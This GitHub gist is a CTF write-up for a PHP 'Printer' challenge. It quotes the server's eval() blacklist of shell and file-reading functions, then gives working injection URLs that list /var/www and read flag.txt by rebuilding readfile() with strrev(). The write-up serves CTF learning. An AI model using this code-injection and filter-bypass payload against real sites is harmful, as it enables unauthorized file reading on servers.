Skip to content

Instantly share code, notes, and snippets.

@amiremohamadi
Last active July 13, 2021 14:24
Show Gist options
  • Save amiremohamadi/c7a132fb5b32aef220b61a8d47ba3f90 to your computer and use it in GitHub Desktop.
Save amiremohamadi/c7a132fb5b32aef220b61a8d47ba3f90 to your computer and use it in GitHub Desktop.
CTF 2021 - Printer challenge solution

Challenge:

http://challenges.ctfd.io:30068/index.php

Solution:

Refer to source file (index.php):

    $blocked = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
    $special_block= "nc";
    $$special_block= "../flag.txt";
    foreach ($blocked as $value) {
      if (strpos($printValue, $value) || preg_match('/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i', $printValue)) {
        $printValue="";
        echo "<script>alert('Bad character/word ditected!');</script>";
        break;
      }
    }

These are blocked words, We sould somehow bypass this black list. As you can see, getcwd() function is not blocked. So we can check the current directory path with it:

http://challenges.ctfd.io:30068/index.php?print=echo%20getcwd()

It says we're in /var/www/html.

The blacklist contains ../flag.txt so the flag might be in /var/www.(?) We can get list of files using readdir():

http://challenges.ctfd.io:30068/index.php?print=echo%20readdir(opendir(%27/var/www%27))

The above input will give us the first file/dir inside /var/www. let's try it with more readdir()s:

http://challenges.ctfd.io:30068/index.php?print=echo%20readdir(opendir(%27/var/www%27));echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();

Wow! flag.txt is just right there! How can we read it? all functions related to reading files are blocked (?)

A simple solution would be using strrev(). as we saw in the source file, it uses eval() function and it just evaluate a string as a php code. we should just generate a string that represents the code.

I'm gonna combine readfile() and strrev() to bypass the black list:

http://challenges.ctfd.io:30068/index.php?print=chdir(%22/var/www/%22);echo%20getcwd();echo%20readdir(opendir(%22/var/www/%22));echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20strrev(%22elifdaer%22)(readdir());&debug=on

Cool! :D

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment